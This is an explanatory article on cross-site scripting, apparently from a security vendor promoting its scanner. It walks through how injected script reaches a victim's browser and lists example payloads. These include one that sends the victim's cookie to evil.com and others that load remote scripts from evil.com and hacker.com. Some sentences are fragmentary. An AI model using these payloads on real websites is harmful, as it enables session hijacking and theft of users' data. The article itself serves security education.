Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.
How Cross-site Scripting works
In order for an XSS attack to take place the vulnerable website needs to directly include user input in its pages. An attacker can then insert a string that will be used within the web page and treated as code by the victim’s browser.
The following server-side pseudo-code is used to display the most recent comment on a web page.
print "<html>" print "<h1>Most recent comment</h1>" print database.latestComment print "</html>"
The above script is simply printing out the latest comment from a comments database and printing the contents out to an HTML page, assuming that the comment printed out only consists of text.
The above page is vulnerable to XSS because an attacker could submit a comment that contains a malicious payload such as
Users visiting the web page will get served the following HTML page.
<html> <h1>Most recent comment</h1> <script>doSomethingEvil();</script> </html>
When the page loads in the victim’s browser, the attacker’s malicious script will execute, most often without the user realizing or being able to prevent such an attack.
XMLHttpRequestto send HTTP requests with arbitrary content to arbitrary destinations.
The above, in combination with social engineering, allow attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. Critically, XSS vulnerabilities provide the perfect ground for attackers to escalate attacks to more serious ones.
“Isn’t Cross-site scripting the user’s problem?”
The anatomy of a Cross-site Scripting attack
An XSS attack needs three actors — the website, the victim and the attacker.
<script> window.location=“http://evil.com/?cookie=” + document.cookie </script>
The figure below illustrates a step-by-step walkthrough of a simple XSS attack.
- The victim requests the web page from the website
- The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.
- The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.
Some examples of Cross-site Scripting attack vectors
The following is a non-exhaustive list of XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained here.
<!-- External script --> <script src=http://evil.com/xss.js></script> <!-- Embedded script --> <script> alert("XSS"); </script>
An XSS payload can be delivered inside
<body> tag by using the
onload attribute or other more obscure attributes such as the
<!-- <iframe> tag XSS --> <iframe src=”http://evil.com/xss.html”>
In some browsers, if the
type attribute of the
<input> tag is set to
image, it can be manipulated to embed a script.
<link> tag, which is often used to link to external style sheets could contain a script.
background attribute of the
td tags can be exploited to refer to a script instead of an image.
<div> tag, similar to the
<td> tags can also specify a background and therefore embed a script.
<object> tag can be used to include in a script from an external site.
<!-- <object> tag XSS --> <object type="text/x-scriptlet" data="http://hacker.com/xss.html">
Is your website or web application vulnerable to Cross-site Scripting?
XSS vulnerabilities are amongst the most widespread web application vulnerabilities on the Internet. Fortunately, it’s easy to test if your website or web application is vulnerable to XSS and other vulnerabilities by running an automated web vulnerability scan using Acunetix. Download the 14-day free on premise trial, or register to our online service to run a scan against your website or web application.